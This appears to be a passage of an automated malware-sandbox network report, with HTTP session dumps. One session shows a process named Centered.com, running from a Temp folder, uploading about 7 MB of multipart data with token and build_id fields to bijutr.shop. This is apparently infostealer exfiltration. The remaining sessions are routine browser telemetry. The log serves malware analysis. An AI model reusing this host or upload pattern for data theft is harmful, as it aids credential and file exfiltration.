                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:40 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      32192.168.2.749902188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DTRQIEUAAI58YUAIWTJM
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 6990993
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 57 54 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 57 54 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 57 54 4a 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------DTRQIEUAAI58YUAIWTJMContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------DTRQIEUAAI58YUAIWTJMContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------DTRQIEUAAI58YUAIWTJMCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:47 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      33192.168.2.74987620.110.205.1194432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC1175OUTGET /c.gif?rnd=1735286739103&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=00d263f4b17344089ebf5bec809664e2&activityId=00d263f4b17344089ebf5bec809664e2&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: c.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: _C_ETH=1; USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                      Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Location: https://c.bing.com/c.gif?rnd=1735286739103&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=00d263f4b17344089ebf5bec809664e2&activityId=00d263f4b17344089ebf5bec809664e2&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CA9C2839891B4BAE9B46E9232B945869&RedC=c.msn.com&MXFR=309DCA2A26BF68F127E0DF4827176945
                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                      P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                      Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                      Set-Cookie: MUID=309DCA2A26BF68F127E0DF4827176945; domain=.msn.com; expires=Wed, 21-Jan-2026 06:10:40 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:40 GMT
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      34192.168.2.74988118.238.49.744432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC925OUTGET /b?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:40 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:40 GMT
                                                                                                                                                                                                                                                                                      Location: /b2?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                      set-cookie: UID=10344ddb4a73bf8506bf1b41735279840; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                      set-cookie: XID=10344ddb4a73bf8506bf1b41735279840; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                      Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                      Via: 1.1 a410463cf33c032bf74ee26bf94b81b2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: HTvYWzBrpEUBSLd2wEOFTY46hfuPo0zUPA_wtQzST5ncaGFsLYNPaQ==


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      35192.168.2.74990518.238.49.744432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:42 UTC1012OUTGET /b2?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: UID=10344ddb4a73bf8506bf1b41735279840; XID=10344ddb4a73bf8506bf1b41735279840
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:42 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:42 GMT
                                                                                                                                                                                                                                                                                      Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                      Via: 1.1 2e60669cf4a63082b5e4935391509354.cloudfront.net (CloudFront)
